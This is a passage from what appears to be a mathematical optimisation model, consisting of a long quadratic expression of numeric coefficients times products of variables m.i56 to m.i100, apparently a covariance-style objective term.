0.00842246*m.i56*m.i64 + 0.00913306*m.i56*m.i65 + 0.0128603*m.i56*m.i66 + 0.00789202*m.i56*m.i67
+ 0.0049437*m.i56*m.i68 + 0.0172921*m.i56*m.i69 + 0.00742364*m.i56*m.i70 + 0.0201228*m.i56*m.i71
+ 0.0118952*m.i56*m.i72 + 0.01088666*m.i56*m.i73 + 0.0107701*m.i56*m.i74 + 0.00409754*m.i56*
m.i75 + 0.00366002*m.i56*m.i76 + 0.01236854*m.i56*m.i77 + 0.00300872*m.i56*m.i78 + 0.0135613*
m.i56*m.i79 + 0.00480806*m.i56*m.i80 + 0.01596128*m.i56*m.i81 + 0.00309564*m.i56*m.i82 +
0.01777436*m.i56*m.i83 + 0.01193038*m.i56*m.i84 + 0.00565974*m.i56*m.i85 + 0.01170688*m.i56*m.i86
+ 0.01022376*m.i56*m.i87 + 0.0163427*m.i56*m.i88 + 0.00612568*m.i56*m.i89 + 0.01115784*m.i56*
m.i90 + 0.00381802*m.i56*m.i91 + 0.0089326*m.i56*m.i92 + 0.0075443*m.i56*m.i93 + 0.00818402*m.i56
*m.i94 + 0.00966992*m.i56*m.i95 + 0.00265106*m.i56*m.i96 + 0.01019204*m.i56*m.i97 + 0.01329902*
m.i56*m.i98 + 0.01411634*m.i56*m.i99 + 0.0138779*m.i56*m.i100 + 0.00474894*m.i57*m.i58 +
0.00767974*m.i57*m.i59 + 0.0043561*m.i57*m.i60 + 0.01478228*m.i57*m.i61 + 0.00989558*m.i57*m.i62
+ 0.00895424*m.i57*m.i63 + 0.0066828*m.i57*m.i64 + 0.00578744*m.i57*m.i65 + 0.00498864*m.i57*
m.i66 + 0.00614268*m.i57*m.i67 + 0.0054738*m.i57*m.i68 + 0.01078148*m.i57*m.i69 + 0.00688352*
m.i57*m.i70 + 0.0068114*m.i57*m.i71 + 0.00628102*m.i57*m.i72 + 0.00701898*m.i57*m.i73 +
0.00848154*m.i57*m.i74 + 0.0066742*m.i57*m.i75 + 0.00450208*m.i57*m.i76 + 0.0074907*m.i57*m.i77
+ 0.00457588*m.i57*m.i78 + 0.00668368*m.i57*m.i79 + 0.00806954*m.i57*m.i80 + 0.00702352*m.i57*
m.i81 + 0.0038917*m.i57*m.i82 + 0.000255196*m.i57*m.i83 + 0.00565464*m.i57*m.i84 + 0.00629044*
m.i57*m.i85 + 0.00649918*m.i57*m.i86 + 0.00619514*m.i57*m.i87 + 0.01578988*m.i57*m.i88 +
0.00523946*m.i57*m.i89 + 0.00717944*m.i57*m.i90 + 0.0080494*m.i57*m.i91 + 0.00534064*m.i57*m.i92
+ 0.00276512*m.i57*m.i93 + 0.00412012*m.i57*m.i94 + 0.00715034*m.i57*m.i95 + 0.01300638*m.i57*
m.i96 + 0.00826382*m.i57*m.i97 + 0.0068466*m.i57*m.i98 + 0.00897648*m.i57*m.i99 + 0.01037138*
m.i57*m.i100 + 0.00646004*m.i58*m.i59 + 0.00186599*m.i58*m.i60 + 0.01246886*m.i58*m.i61 +
0.00999352*m.i58*m.i62 + 0.01381952*m.i58*m.i63 + 0.00855014*m.i58*m.i64 + 0.00465434*m.i58*m.i65
+ 0.00825376*m.i58*m.i66 + 0.00576402*m.i58*m.i67 + 0.00273548*m.i58*m.i68 + 0.01035762*m.i58*
m.i69 + 0.004824*m.i58*m.i70 + 0.01355144*m.i58*m.i71 + 0.00700278*m.i58*m.i72 + 0.00707718*m.i58
*m.i73 + 0.00851974*m.i58*m.i74 + 0.00330912*m.i58*m.i75 + 0.00401842*m.i58*m.i76 + 0.00999942*
m.i58*m.i77 + 0.00277578*m.i58*m.i78 - 0.000989722*m.i58*m.i79 + 0.00742188*m.i58*m.i80 +
0.00901096*m.i58*m.i81 + 0.000981242*m.i58*m.i82 + 0.01290728*m.i58*m.i83 + 0.0083181*m.i58*m.i84
+ 0.00517936*m.i58*m.i85 + 0.00723458*m.i58*m.i86 + 0.0044253*m.i58*m.i87 + 0.0137847*m.i58*
m.i88 + 0.001547694*m.i58*m.i89 + 0.00582604*m.i58*m.i90 + 0.00844516*m.i58*m.i91 + 0.00776542*
m.i58*m.i92 + 0.00182761*m.i58*m.i93 + 0.0023829*m.i58*m.i94 + 0.00628056*m.i58*m.i95 +
0.00690478*m.i58*m.i96 + 0.00802988*m.i58*m.i97 + 0.0076502*m.i58*m.i98 + 0.01085276*m.i58*m.i99
+ 0.0112764*m.i58*m.i100 + 0.00476864*m.i59*m.i60 + 0.025812*m.i59*m.i61 + 0.01805478*m.i59*
m.i62 + 0.0109551*m.i59*m.i63 + 0.00938908*m.i59*m.i64 + 0.01178962*m.i59*m.i65 + 0.0076335*m.i59
*m.i66 + 0.01177666*m.i59*m.i67 + 0.0070214*m.i59*m.i68 + 0.0221478*m.i59*m.i69 + 0.007972*m.i59*
m.i70 + 0.0074733*m.i59*m.i71 + 0.0088486*m.i59*m.i72 + 0.01271666*m.i59*m.i73 + 0.0141508*m.i59*
m.i74 + 0.00914726*m.i59*m.i75 + 0.00537448*m.i59*m.i76 + 0.01084216*m.i59*m.i77 + 0.0073258*
m.i59*m.i78 + 0.0246694*m.i59*m.i79 + 0.01112936*m.i59*m.i80 + 0.00816652*m.i59*m.i81 +
0.00597972*m.i59*m.i82 + 0.00662172*m.i59*m.i83 + 0.01458364*m.i59*m.i84 + 0.01429256*m.i59*m.i85
+ 0.01882618*m.i59*m.i86 + 0.01439702*m.i59*m.i87 + 0.034478*m.i59*m.i88 + 0.0080275*m.i59*m.i89
+ 0.01623632*m.i59*m.i90 + 0.01482176*m.i59*m.i91 + 0.01127396*m.i59*m.i92 + 0.00550568*m.i59*
m.i93 + 0.00798042*m.i59*m.i94 + 0.01294416*m.i59*m.i95 + 0.0212862*m.i59*m.i96 + 0.01627426*
m.i59*m.i97 + 0.0106876*m.i59*m.i98 + 0.021021*m.i59*m.i99 + 0.0210024*m.i59*m.i100 + 0.01016558*
m.i60*m.i61 + 0.00950624*m.i60*m.i62 + 0.00759926*m.i60*m.i63 + 0.00405624*m.i60*m.i64 +
0.00408766*m.i60*m.i65 + 0.001012866*m.i60*m.i66 + 0.00434698*m.i60*m.i67 + 0.00457798*m.i60*
m.i68 + 0.0080193*m.i60*m.i69 + 0.0054101*m.i60*m.i70 + 0.0046192*m.i60*m.i71 + 0.00570946*m.i60*
m.i72 + 0.00452172*m.i60*m.i73 + 0.00634618*m.i60*m.i74 + 0.00624388*m.i60*m.i75 + 0.0033187*
m.i60*m.i76 + 0.00483228*m.i60*m.i77 + 0.00344686*m.i60*m.i78 + 0.0083673*m.i60*m.i79 +
0.00518592*m.i60*m.i80 + 0.00542166*m.i60*m.i81 + 0.0031059*m.i60*m.i82 - 0.001025068*m.i60*m.i83
+ 0.0028835*m.i60*m.i84 + 0.00445296*m.i60*m.i85 + 0.00423572*m.i60*m.i86 + 0.0051822*m.i60*
m.i87 + 0.01112192*m.i60*m.i88 + 0.00500464*m.i60*m.i89 + 0.0062184*m.i60*m.i90 + 0.00602*m.i60*
m.i91 + 0.00246398*m.i60*m.i92 + 0.00288384*m.i60*m.i93 + 0.00278724*m.i60*m.i94 + 0.00626372*
m.i60*m.i95 + 0.01170704*m.i60*m.i96 + 0.00615192*m.i60*m.i97 + 0.00462302*m.i60*m.i98 +
0.00471294*m.i60*m.i99 + 0.00588256*m.i60*m.i100 + 0.0418718*m.i61*m.i62 + 0.0230598*m.i61*m.i63
+ 0.01842282*m.i61*m.i64 + 0.01721234*m.i61*m.i65 + 0.00990124*m.i61*m.i66 + 0.0216044*m.i61*
m.i67 + 0.01473812*m.i61*m.i68 + 0.0394464*m.i61*m.i69 + 0.01716988*m.i61*m.i70 + 0.0195513*m.i61
*m.i71 + 0.0219932*m.i61*m.i72 + 0.01943214*m.i61*m.i73 + 0.020134*m.i61*m.i74 + 0.0174732*m.i61*
m.i75 + 0.01174406*m.i61*m.i76 + 0.01834496*m.i61*m.i77 + 0.01109086*m.i61*m.i78 + 0.0264464*
m.i61*m.i79 + 0.01965936*m.i61*m.i80 + 0.0227546*m.i61*m.i81 + 0.00831452*m.i61*m.i82 +
0.00631004*m.i61*m.i83 + 0.01801602*m.i61*m.i84 + 0.01882322*m.i61*m.i85 + 0.026381*m.i61*m.i86
+ 0.0201168*m.i61*m.i87 + 0.0582994*m.i61*m.i88 + 0.01420784*m.i61*m.i89 + 0.0279352*m.i61*m.i90
+ 0.0260044*m.i61*m.i91 + 0.01994278*m.i61*m.i92 + 0.00558188*m.i61*m.i93 + 0.0100806*m.i61*
m.i94 + 0.0228614*m.i61*m.i95 + 0.0472894*m.i61*m.i96 + 0.0277624*m.i61*m.i97 + 0.0233414*m.i61*
m.i98 + 0.0320998*m.i61*m.i99 + 0.037788*m.i61*m.i100 + 0.0226754*m.i62*m.i63 + 0.01497022*m.i62*
m.i64 + 0.0138219*m.i62*m.i65 + 0.00559668*m.i62*m.i66 + 0.01850946*m.i62*m.i67 + 0.01131414*
m.i62*m.i68 + 0.0392412*m.i62*m.i69 + 0.01609634*m.i62*m.i70 + 0.0216048*m.i62*m.i71 + 0.0216526*
m.i62*m.i72 + 0.0150155*m.i62*m.i73 + 0.01738604*m.i62*m.i74 + 0.01374744*m.i62*m.i75 +
0.00779326*m.i62*m.i76 + 0.01429558*m.i62*m.i77 + 0.0081994*m.i62*m.i78 + 0.024889*m.i62*m.i79 +
0.01494124*m.i62*m.i80 + 0.0229898*m.i62*m.i81 + 0.00445144*m.i62*m.i82 + 0.01114552*m.i62*m.i83
+ 0.01793036*m.i62*m.i84 + 0.01444614*m.i62*m.i85 + 0.01879448*m.i62*m.i86 + 0.01466504*m.i62*
m.i87 + 0.0326604*m.i62*m.i88 + 0.01169144*m.i62*m.i89 + 0.0254028*m.i62*m.i90 + 0.01965996*m.i62
*m.i91 + 0.01132102*m.i62*m.i92 + 0.0046546*m.i62*m.i93 + 0.00635342*m.i62*m.i94 + 0.0209304*
m.i62*m.i95 + 0.040751*m.i62*m.i96 + 0.0251822*m.i62*m.i97 + 0.0238578*m.i62*m.i98 + 0.0225858*
m.i62*m.i99 + 0.0313134*m.i62*m.i100 + 0.01545704*m.i63*m.i64 + 0.01086358*m.i63*m.i65 +
0.00996396*m.i63*m.i66 + 0.00982328*m.i63*m.i67 + 0.00892944*m.i63*m.i68 + 0.024956*m.i63*m.i69
+ 0.0125295*m.i63*m.i70 + 0.0274234*m.i63*m.i71 + 0.0136346*m.i63*m.i72 + 0.0143589*m.i63*m.i73
+ 0.01281966*m.i63*m.i74 + 0.009889*m.i63*m.i75 + 0.00617316*m.i63*m.i76 + 0.0195622*m.i63*m.i77
+ 0.00502572*m.i63*m.i78 + 0.00153262*m.i63*m.i79 + 0.01706792*m.i63*m.i80 + 0.01790944*m.i63*
m.i81 + 0.001490592*m.i63*m.i82 + 0.0267338*m.i63*m.i83 + 0.01586496*m.i63*m.i84 + 0.01166282*
m.i63*m.i85 + 0.01568614*m.i63*m.i86 + 0.00753188*m.i63*m.i87 + 0.0417782*m.i63*m.i88 + 0.0112216
*m.i63*m.i89 + 0.00371206*m.i63*m.i90 + 0.01829192*m.i63*m.i91 + 0.01841964*m.i63*m.i92 +
0.00206622*m.i63*m.i93 + 0.00505172*m.i63*m.i94 + 0.01487174*m.i63*m.i95 + 0.01414348*m.i63*m.i96
+ 0.0156802*m.i63*m.i97 + 0.01823426*m.i63*m.i98 + 0.01258764*m.i63*m.i99 + 0.01994098*m.i63*
m.i100 + 0.00854654*m.i64*m.i65 + 0.01079866*m.i64*m.i66 + 0.00602732*m.i64*m.i67 + 0.00921276*
m.i64*m.i68 + 0.01464414*m.i64*m.i69 + 0.00664932*m.i64*m.i70 + 0.0144736*m.i64*m.i71 +
0.00978338*m.i64*m.i72 + 0.00959208*m.i64*m.i73 + 0.0112566*m.i64*m.i74 + 0.00671142*m.i64*m.i75
+ 0.00408206*m.i64*m.i76 + 0.01167568*m.i64*m.i77 + 0.00375274*m.i64*m.i78 + 0.00404336*m.i64*
m.i79 + 0.00963238*m.i64*m.i80 + 0.0122908*m.i64*m.i81 + 0.001806772*m.i64*m.i82 + 0.01577266*
m.i64*m.i83 + 0.01128074*m.i64*m.i84 + 0.0095111*m.i64*m.i85 + 0.0097723*m.i64*m.i86 + 0.00346618
*m.i64*m.i87 + 0.01289324*m.i64*m.i88 + 0.00453186*m.i64*m.i89 + 0.0078486*m.i64*m.i90 +
0.01310134*m.i64*m.i91 + 0.00985686*m.i64*m.i92 + 0.00257788*m.i64*m.i93 + 0.00260324*m.i64*m.i94
+ 0.0108877*m.i64*m.i95 + 0.01349616*m.i64*m.i96 + 0.01306042*m.i64*m.i97 + 0.01405114*m.i64*
m.i98 + 0.0115142*m.i64*m.i99 + 0.01728302*m.i64*m.i100 + 0.0048225*m.i65*m.i66 + 0.00871696*
m.i65*m.i67 + 0.00504014*m.i65*m.i68 + 0.01673796*m.i65*m.i69 + 0.00728674*m.i65*m.i70 +
0.00969202*m.i65*m.i71 + 0.0082057*m.i65*m.i72 + 0.0103704*m.i65*m.i73 + 0.00998004*m.i65*m.i74
+ 0.00672722*m.i65*m.i75 + 0.00633346*m.i65*m.i76 + 0.00774852*m.i65*m.i77 + 0.00440922*m.i65*
m.i78 + 0.01343946*m.i65*m.i79 + 0.00798994*m.i65*m.i80 + 0.01225132*m.i65*m.i81 + 0.00444398*
m.i65*m.i82 + 0.00673302*m.i65*m.i83 + 0.0109598*m.i65*m.i84 + 0.00683186*m.i65*m.i85 +
0.01183874*m.i65*m.i86 + 0.0090907*m.i65*m.i87 + 0.0283952*m.i65*m.i88 + 0.00785096*m.i65*m.i89
+ 0.01125058*m.i65*m.i90 + 0.00510526*m.i65*m.i91 + 0.00837574*m.i65*m.i92 + 0.00385798*m.i65*
m.i93 + 0.00464904*m.i65*m.i94 + 0.00896456*m.i65*m.i95 + 0.0160694*m.i65*m.i96 + 0.0113557*m.i65
*m.i97 + 0.01155766*m.i65*m.i98 + 0.01443876*m.i65*m.i99 + 0.01238186*m.i65*m.i100 + 0.00548536*
m.i66*m.i67 + 0.00630564*m.i66*m.i68 + 0.00939978*m.i66*m.i69 + 0.00431468*m.i66*m.i70 +
0.01542742*m.i66*m.i71 + 0.0071665*m.i66*m.i72 + 0.00755022*m.i66*m.i73 + 0.00838922*m.i66*m.i74
+ 0.00386922*m.i66*m.i75 + 0.001951058*m.i66*m.i76 + 0.01146338*m.i66*m.i77 + 0.001980078*m.i66*
m.i78 + 0.00444902*m.i66*m.i79 + 0.00356762*m.i66*m.i80 + 0.00956806*m.i66*m.i81 - 0.00023183*
m.i66*m.i82 + 0.01703884*m.i66*m.i83 + 0.01002452*m.i66*m.i84 + 0.0062546*m.i66*m.i85 +
0.00563304*m.i66*m.i86 + 0.00514984*m.i66*m.i87 + 0.01908326*m.i66*m.i88 + 0.00457928*m.i66*m.i89
+ 0.003995*m.i66*m.i90 + 0.0080501*m.i66*m.i91 + 0.00810108*m.i66*m.i92 + 0.00328186*m.i66*m.i93
+ 0.00369064*m.i66*m.i94 + 0.0058103*m.i66*m.i95 + 0.00438208*m.i66*m.i96 + 0.00867896*m.i66*
m.i97 + 0.0114927*m.i66*m.i98 + 0.01103938*m.i66*m.i99 + 0.00981454*m.i66*m.i100 + 0.00310364*
m.i67*m.i68 + 0.0195756*m.i67*m.i69 + 0.00833924*m.i67*m.i70 + 0.01122*m.i67*m.i71 + 0.00862168*
m.i67*m.i72 + 0.00711248*m.i67*m.i73 + 0.00958304*m.i67*m.i74 + 0.00671208*m.i67*m.i75 +
0.00667666*m.i67*m.i76 + 0.00639998*m.i67*m.i77 + 0.00746068*m.i67*m.i78 + 0.0164696*m.i67*m.i79
+ 0.00952472*m.i67*m.i80 + 0.01054908*m.i67*m.i81 + 0.00295206*m.i67*m.i82 + 0.00786538*m.i67*
m.i83 + 0.00812566*m.i67*m.i84 + 0.00774908*m.i67*m.i85 + 0.01084866*m.i67*m.i86 + 0.01179554*
m.i67*m.i87 + 0.022894*m.i67*m.i88 + 0.00619526*m.i67*m.i89 + 0.01517056*m.i67*m.i90 + 0.00567344
*m.i67*m.i91 + 0.00901318*m.i67*m.i92 + 0.00388018*m.i67*m.i93 + 0.0036956*m.i67*m.i94 + 0.008896
*m.i67*m.i95 + 0.021896*m.i67*m.i96 + 0.01327636*m.i67*m.i97 + 0.0109*m.i67*m.i98 + 0.0178563*
m.i67*m.i99 + 0.01328366*m.i67*m.i100 + 0.01361686*m.i68*m.i69 + 0.00764086*m.i68*m.i70 +
0.00794036*m.i68*m.i71 + 0.01077146*m.i68*m.i72 + 0.00701056*m.i68*m.i73 + 0.00764336*m.i68*m.i74
+ 0.01085638*m.i68*m.i75 + 0.00267198*m.i68*m.i76 + 0.00622086*m.i68*m.i77 + 0.0026961*m.i68*
m.i78 + 0.01283914*m.i68*m.i79 + 0.00651186*m.i68*m.i80 + 0.00444824*m.i68*m.i81 + 0.00245108*
m.i68*m.i82 - 0.000724804*m.i68*m.i83 + 0.01001432*m.i68*m.i84 + 0.00659112*m.i68*m.i85 +
0.00798872*m.i68*m.i86 + 0.00378278*m.i68*m.i87 + 0.0249894*m.i68*m.i88 + 0.00935338*m.i68*m.i89
+ 0.00406214*m.i68*m.i90 + 0.01547864*m.i68*m.i91 + 0.0026383*m.i68*m.i92 + 0.001956366*m.i68*
m.i93 + 0.00433104*m.i68*m.i94 + 0.0086862*m.i68*m.i95 + 0.00871594*m.i68*m.i96 + 0.00917804*
m.i68*m.i97 + 0.01147728*m.i68*m.i98 + 0.000904318*m.i68*m.i99 + 0.0095902*m.i68*m.i100 +
0.01716134*m.i69*m.i70 + 0.0210128*m.i69*m.i71 + 0.01970512*m.i69*m.i72 + 0.01824406*m.i69*m.i73
+ 0.0202038*m.i69*m.i74 + 0.0166321*m.i69*m.i75 + 0.0080034*m.i69*m.i76 + 0.01785698*m.i69*m.i77
+ 0.00956708*m.i69*m.i78 + 0.0273938*m.i69*m.i79 + 0.01578286*m.i69*m.i80 + 0.01986548*m.i69*
m.i81 + 0.00472512*m.i69*m.i82 + 0.0064477*m.i69*m.i83 + 0.0205866*m.i69*m.i84 + 0.01485404*m.i69
*m.i85 + 0.0219926*m.i69*m.i86 + 0.01726592*m.i69*m.i87 + 0.044296*m.i69*m.i88 + 0.01519388*m.i69
*m.i89 + 0.0245318*m.i69*m.i90 + 0.019668*m.i69*m.i91 + 0.01322886*m.i69*m.i92 + 0.00622812*m.i69
*m.i93 + 0.00886068*m.i69*m.i94 + 0.0207946*m.i69*m.i95 + 0.0369544*m.i69*m.i96 + 0.0252064*m.i69
*m.i97 + 0.0246794*m.i69*m.i98 + 0.0240826*m.i69*m.i99 + 0.0322226*m.i69*m.i100 + 0.01122678*
m.i70*m.i71 + 0.00985708*m.i70*m.i72 + 0.00817346*m.i70*m.i73 + 0.01042594*m.i70*m.i74 +
0.0087512*m.i70*m.i75 + 0.00587552*m.i70*m.i76 + 0.00956692*m.i70*m.i77 + 0.00604702*m.i70*m.i78
+ 0.01012786*m.i70*m.i79 + 0.00894572*m.i70*m.i80 + 0.00937532*m.i70*m.i81 + 0.0040741*m.i70*
m.i82 + 0.001290572*m.i70*m.i83 + 0.00820512*m.i70*m.i84 + 0.00683756*m.i70*m.i85 + 0.00768078*
m.i70*m.i86 + 0.00827048*m.i70*m.i87 + 0.01990564*m.i70*m.i88 + 0.007123*m.i70*m.i89 + 0.00998564
*m.i70*m.i90 + 0.00953688*m.i70*m.i91 + 0.00558782*m.i70*m.i92 + 0.00342686*m.i70*m.i93 +
0.00568486*m.i70*m.i94 + 0.00914938*m.i70*m.i95 + 0.01630104*m.i70*m.i96 + 0.01110616*m.i70*m.i97
+ 0.010247*m.i70*m.i98 + 0.00833958*m.i70*m.i99 + 0.01265252*m.i70*m.i100 + 0.0220254*m.i71*
m.i72 + 0.0095213*m.i71*m.i73 + 0.01209936*m.i71*m.i74 + 0.00527094*m.i71*m.i75 + 0.00557218*
m.i71*m.i76 + 0.01262004*m.i71*m.i77 + 0.0037353*m.i71*m.i78 - 0.000223588*m.i71*m.i79 +
0.00801532*m.i71*m.i80 + 0.0286786*m.i71*m.i81 + 0.000788336*m.i71*m.i82 + 0.0387752*m.i71*m.i83
+ 0.01552284*m.i71*m.i84 + 0.00720994*m.i71*m.i85 + 0.01148132*m.i71*m.i86 + 0.00870698*m.i71*
m.i87 + 0.028675*m.i71*m.i88 + 0.00544718*m.i71*m.i89 + 0.00673884*m.i71*m.i90 + 0.01008984*m.i71
*m.i91 + 0.01241834*m.i71*m.i92 + 0.0025495*m.i71*m.i93 + 0.00280272*m.i71*m.i94 + 0.00947552*
m.i71*m.i95 + 0.0070495*m.i71*m.i96 + 0.0170916*m.i71*m.i97 + 0.0269036*m.i71*m.i98 + 0.01506306*
m.i71*m.i99 + 0.0206782*m.i71*m.i100 + 0.00925426*m.i72*m.i73 + 0.00967792*m.i72*m.i74 +
0.00847338*m.i72*m.i75 + 0.005213*m.i72*m.i76 + 0.00908662*m.i72*m.i77 + 0.00316872*m.i72*m.i78
+ 0.00898138*m.i72*m.i79 + 0.0069179*m.i72*m.i80 + 0.0151281*m.i72*m.i81 + 0.00348424*m.i72*
m.i82 + 0.01111986*m.i72*m.i83 + 0.01165966*m.i72*m.i84 + 0.0064802*m.i72*m.i85 + 0.00959246*
m.i72*m.i86 + 0.0084611*m.i72*m.i87 + 0.0240956*m.i72*m.i88 + 0.00687054*m.i72*m.i89 + 0.0094553*
m.i72*m.i90 + 0.0110757*m.i72*m.i91 + 0.00543508*m.i72*m.i92 + 0.0037306*m.i72*m.i93 + 0.00500972
*m.i72*m.i94 + 0.01005818*m.i72*m.i95 + 0.01294332*m.i72*m.i96 + 0.01344022*m.i72*m.i97 +
0.01593132*m.i72*m.i98 + 0.0093216*m.i72*m.i99 + 0.01640118*m.i72*m.i100 + 0.01198598*m.i73*m.i74
+ 0.00750544*m.i73*m.i75 + 0.0050216*m.i73*m.i76 + 0.01285904*m.i73*m.i77 + 0.00339452*m.i73*
m.i78 + 0.00891788*m.i73*m.i79 + 0.00948614*m.i73*m.i80 + 0.00944098*m.i73*m.i81 + 0.00409826*
m.i73*m.i82 + 0.00488372*m.i73*m.i83 + 0.01210326*m.i73*m.i84 + 0.00827726*m.i73*m.i85 +
0.0117403*m.i73*m.i86 + 0.00812428*m.i73*m.i87 + 0.031499*m.i73*m.i88 + 0.00909586*m.i73*m.i89 +
0.00829156*m.i73*m.i90 + 0.0112196*m.i73*m.i91 + 0.00781298*m.i73*m.i92 + 0.00380884*m.i73*m.i93
+ 0.00624296*m.i73*m.i94 + 0.01005016*m.i73*m.i95 + 0.01437472*m.i73*m.i96 + 0.011277*m.i73*
m.i97 + 0.01058622*m.i73*m.i98 + 0.0121454*m.i73*m.i99 + 0.01373088*m.i73*m.i100 + 0.01080198*
m.i74*m.i75 + 0.00656182*m.i74*m.i76 + 0.01437682*m.i74*m.i77 + 0.00746976*m.i74*m.i78 +
0.0158128*m.i74*m.i79 + 0.01161714*m.i74*m.i80 + 0.01098286*m.i74*m.i81 + 0.00409892*m.i74*m.i82
+ 0.00263806*m.i74*m.i83 + 0.01368742*m.i74*m.i84 + 0.00966578*m.i74*m.i85 + 0.0126469*m.i74*
m.i86 + 0.0097362*m.i74*m.i87 + 0.0236752*m.i74*m.i88 + 0.0087263*m.i74*m.i89 + 0.01653132*m.i74*
m.i90 + 0.01259886*m.i74*m.i91 + 0.0074886*m.i74*m.i92 + 0.00612882*m.i74*m.i93 + 0.00553384*
m.i74*m.i94 + 0.01256076*m.i74*m.i95 + 0.022837*m.i74*m.i96 + 0.01489052*m.i74*m.i97 + 0.0138654*
m.i74*m.i98 + 0.01608016*m.i74*m.i99 + 0.0185439*m.i74*m.i100 + 0.00483222*m.i75*m.i76 +
0.0084646*m.i75*m.i77 + 0.00605234*m.i75*m.i78 + 0.01627408*m.i75*m.i79 + 0.00784142*m.i75*m.i80
+ 0.00564276*m.i75*m.i81 + 0.00324588*m.i75*m.i82 - 0.00767236*m.i75*m.i83 + 0.00699372*m.i75*
m.i84 + 0.00737608*m.i75*m.i85 + 0.00954642*m.i75*m.i86 + 0.00823136*m.i75*m.i87 + 0.0262748*
m.i75*m.i88 + 0.00948902*m.i75*m.i89 + 0.01252876*m.i75*m.i90 + 0.01423104*m.i75*m.i91 +
0.00521492*m.i75*m.i92 + 0.00397698*m.i75*m.i93 + 0.00422896*m.i75*m.i94 + 0.01025216*m.i75*m.i95
+ 0.021456*m.i75*m.i96 + 0.01000128*m.i75*m.i97 + 0.00860654*m.i75*m.i98 + 0.0079023*m.i75*m.i99
+ 0.01223272*m.i75*m.i100 + 0.00508036*m.i76*m.i77 + 0.00440326*m.i76*m.i78 + 0.00722936*m.i76*
m.i79 + 0.00592748*m.i76*m.i80 + 0.00543106*m.i76*m.i81 + 0.00352072*m.i76*m.i82 + 0.00282876*
m.i76*m.i83 + 0.00421804*m.i76*m.i84 + 0.00327576*m.i76*m.i85 + 0.00605002*m.i76*m.i86 +
0.00724932*m.i76*m.i87 + 0.01581762*m.i76*m.i88 + 0.00366428*m.i76*m.i89 + 0.00812736*m.i76*m.i90
+ 0.00388382*m.i76*m.i91 + 0.0047062*m.i76*m.i92 + 0.00287772*m.i76*m.i93 + 0.00297876*m.i76*
m.i94 + 0.00459654*m.i76*m.i95 + 0.01070758*m.i76*m.i96 + 0.0061617*m.i76*m.i97 + 0.00324936*
m.i76*m.i98 + 0.00970994*m.i76*m.i99 + 0.00690694*m.i76*m.i100 + 0.00393188*m.i77*m.i78 +
0.00648912*m.i77*m.i79 + 0.00880144*m.i77*m.i80 + 0.00990674*m.i77*m.i81 + 0.00277832*m.i77*m.i82
+ 0.01369158*m.i77*m.i83 + 0.01108874*m.i77*m.i84 + 0.00804488*m.i77*m.i85 + 0.0100624*m.i77*
m.i86 + 0.00868852*m.i77*m.i87 + 0.0320896*m.i77*m.i88 + 0.00865688*m.i77*m.i89 + 0.00846622*
m.i77*m.i90 + 0.01262084*m.i77*m.i91 + 0.01111726*m.i77*m.i92 + 0.00462154*m.i77*m.i93 +
0.00718072*m.i77*m.i94 + 0.01147082*m.i77*m.i95 + 0.0176254*m.i77*m.i96 + 0.01224072*m.i77*m.i97
+ 0.00939734*m.i77*m.i98 + 0.012534*m.i77*m.i99 + 0.01295098*m.i77*m.i100 + 0.00907912*m.i78*
m.i79 + 0.00720642*m.i78*m.i80 + 0.00426806*m.i78*m.i81 + 0.0028332*m.i78*m.i82 - 0.001354666*
m.i78*m.i83 + 0.00318608*m.i78*m.i84 + 0.00627032*m.i78*m.i85 + 0.00574778*m.i78*m.i86 +
0.00663794*m.i78*m.i87 + 0.00493084*m.i78*m.i88 + 0.00225816*m.i78*m.i89 + 0.01063042*m.i78*m.i90
+ 0.0063342*m.i78*m.i91 + 0.00541402*m.i78*m.i92 + 0.00268782*m.i78*m.i93 + 0.00290288*m.i78*
m.i94 + 0.00588184*m.i78*m.i95 + 0.01436716*m.i78*m.i96 + 0.00728756*m.i78*m.i97 + 0.00442972*
m.i78*m.i98 + 0.00924454*m.i78*m.i99 + 0.00979098*m.i78*m.i100 + 0.0060581*m.i79*m.i80 +
0.00755126*m.i79*m.i81 + 0.00637932*m.i79*m.i82 - 0.00105651*m.i79*m.i83 + 0.01349704*m.i79*m.i84
+ 0.01178354*m.i79*m.i85 + 0.0220208*m.i79*m.i86 + 0.0245836*m.i79*m.i87 + 0.0524002*m.i79*m.i88
+ 0.0230428*m.i79*m.i89 + 0.0314514*m.i79*m.i90 + 0.00636018*m.i79*m.i91 + 0.0061917*m.i79*m.i92
+ 0.01207768*m.i79*m.i93 + 0.00753416*m.i79*m.i94 + 0.01719794*m.i79*m.i95 + 0.0367202*m.i79*
m.i96 + 0.01636496*m.i79*m.i97 + 0.01053626*m.i79*m.i98 + 0.0223148*m.i79*m.i99 + 0.0125583*m.i79
*m.i100 + 0.00731124*m.i80*m.i81 + 0.0043053*m.i80*m.i82 + 0.00250064*m.i80*m.i83 + 0.00942746*
m.i80*m.i84 + 0.01109824*m.i80*m.i85 + 0.0094077*m.i80*m.i86 + 0.00584688*m.i80*m.i87 +
0.01773876*m.i80*m.i88 + 0.00587054*m.i80*m.i89 + 0.0073899*m.i80*m.i90 + 0.01217556*m.i80*m.i91
+ 0.0092825*m.i80*m.i92 + 0.001672258*m.i80*m.i93 + 0.00403362*m.i80*m.i94 + 0.01001412*m.i80*
m.i95 + 0.01641906*m.i80*m.i96 + 0.01159292*m.i80*m.i97 + 0.01062798*m.i80*m.i98 + 0.00967468*
m.i80*m.i99 + 0.0140493*m.i80*m.i100 + 0.00288116*m.i81*m.i82 + 0.022981*m.i81*m.i83 + 0.01105584
*m.i81*m.i84 + 0.00722284*m.i81*m.i85 + 0.01178602*m.i81*m.i86 + 0.00945868*m.i81*m.i87 +
0.024973*m.i81*m.i88 + 0.00575624*m.i81*m.i89 + 0.01415098*m.i81*m.i90 + 0.0066048*m.i81*m.i91 +
0.01072344*m.i81*m.i92 + 0.00322326*m.i81*m.i93 + 0.00351188*m.i81*m.i94 + 0.01127788*m.i81*m.i95
+ 0.01956074*m.i81*m.i96 + 0.01617428*m.i81*m.i97 + 0.0227228*m.i81*m.i98 + 0.01855842*m.i81*
m.i99 + 0.01991896*m.i81*m.i100 - 0.00333172*m.i82*m.i83 + 0.00228114*m.i82*m.i84 + 0.00336158*
m.i82*m.i85 + 0.00354748*m.i82*m.i86 + 0.00514572*m.i82*m.i87 + 0.00636398*m.i82*m.i88 +
0.00276272*m.i82*m.i89 + 0.00394504*m.i82*m.i90 + 0.00242814*m.i82*m.i91 + 0.00151634*m.i82*m.i92
